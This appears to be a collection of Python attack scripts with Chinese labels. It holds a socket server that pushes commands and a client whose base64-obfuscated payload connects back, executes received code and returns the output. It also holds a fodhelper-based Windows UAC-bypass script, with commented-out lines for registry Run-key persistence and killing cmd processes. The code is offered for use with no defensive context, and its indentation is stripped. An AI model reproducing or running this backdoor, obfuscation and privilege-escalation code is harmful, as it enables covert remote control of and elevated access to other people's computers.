脚本
server.py
import socket # 导入 socket 模块
s = socket.socket() # 创建 socket 对象
host = "127.0.0.1" # 获取本地主机名
port = 12345 # 设置端口
s.bind((host, port)) # 绑定端口
s.listen(5) # 等待客户端连接
while True:
c, addr = s.accept() # 建立客户端连接
print('连接地址:', addr)
# cs = "import os\\ndef sys_order():\\n\\tval = os.popen('dir').read()\\n\\treturn val"
cs = str(input())
cs = "" + cs + ""
c.send(cs.encode('utf-8'))
while True:
k = c.recv(1024)
if len(k) == 0: continue
print(k.decode('utf-8'))
# cs = "import os\\ndef sys_order():\\n\\tval = os.popen('dir').read()\\n\\treturn val"
脚本
client.py
import base64
exec(base64.b64decode(b'CmltcG9ydCBzb2NrZXQKaW1wb3J0IHRpbWUKd2hpbGUgVHJ1ZToKCXRyeToKCQlzID0gc29ja2V0LnNvY2tldCgyLCBzb2NrZXQuU09DS19TVFJFQU0pCgkJcy5jb25uZWN0KCgnMTI3LjAuMC4xJywgMTIzNDUpKQoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKCXdoaWxlIFRydWU6CgkJZXhwID0gcy5yZWN2KDEwMjQpLmRlY29kZSgndXRmLTgnKQoJCWV4cCA9IGV4cC5yZXBsYWNlKCdcXG4nLCAnXG4nKQoJCWV4cCA9IGV4cC5yZXBsYWNlKCdcXHQnLCAnXHQnKQoJCWlmIGV4cCAhPSAnJzoKCQkJc2VuZEV4cCA9ICcnCgkJCWV4ZWMoZXhwICsgIlxuc2VuZEV4cCA9IHN5c19vcmRlcigpIikKCQkJcy5zZW5kKHNlbmRFeHAuZW5jb2RlKCd1dGYtOCcpKQoJCQlwcmludChzZW5kRXhwKQo=').decode('utf-8'))
Windows调用管理员CMD
from __future__ import print_function
import os
import sys
import ctypes
if sys.version_info[0] == 3:
import winreg as winreg
else:
import _winreg as winreg
CMD = r"C:\\Windows\\System32\\cmd.exe"
FOD_HELPER = r'C:\\Windows\\System32\\fodhelper.exe'
PYTHON_CMD = "python"
REG_PATH = 'Software\\Classes\\ms-settings\\shell\\open\\command'
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'
def is_admin():
'''
Checks if the script is running with administrative privileges.
Returns True if is running as admin, False otherwise.
'''
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
def create_reg_key(key, value):
'''
Creates a reg key
'''
try:
winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH)
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE)
winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)
winreg.CloseKey(registry_key)
except WindowsError:
raise
def bypass_uac(cmd):
'''
Tries to bypass the UAC
'''
try:
create_reg_key(DELEGATE_EXEC_REG_KEY, '')
create_reg_key(None, cmd)
except WindowsError:
raise
def execute():
if not is_admin():
# print('[!] The script is NOT running with administrative privileges')
# print('[+] Trying to bypass the UAC')
try:
pwd = os.getcwd()
current_dir = __file__
cmd = '{} /k {} {}\\{}'.format(CMD, PYTHON_CMD, pwd, current_dir)
bypass_uac(cmd)
os.system(FOD_HELPER)
sys.exit(0)
# 下面的代码是在虚拟环境中执行,上面的是直接调用cmd执行python
# 区别在pwd,可以打印查看具体区别
# current_dir = __file__
# cmd = '{} /k {} {}'.format(CMD, PYTHON_CMD, current_dir)
# bypass_uac(cmd)
# os.system(FOD_HELPER)
# sys.exit(0)
except WindowsError:
sys.exit(1)
else:
# 这里添加我们需要管理员权限的代码
# 强制写入注册表
# os.system('reg add "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /f /v ainiyo /t REG_SZ /d "E:\\passsword\\newworld.exe"')
# print('[+] The script is running with administrative privileges!')
# 杀死所有的进程
# os.system('taskkill /f /t /im cmd.exe')
os.system('dir')
if __name__ == '__main__':
execute()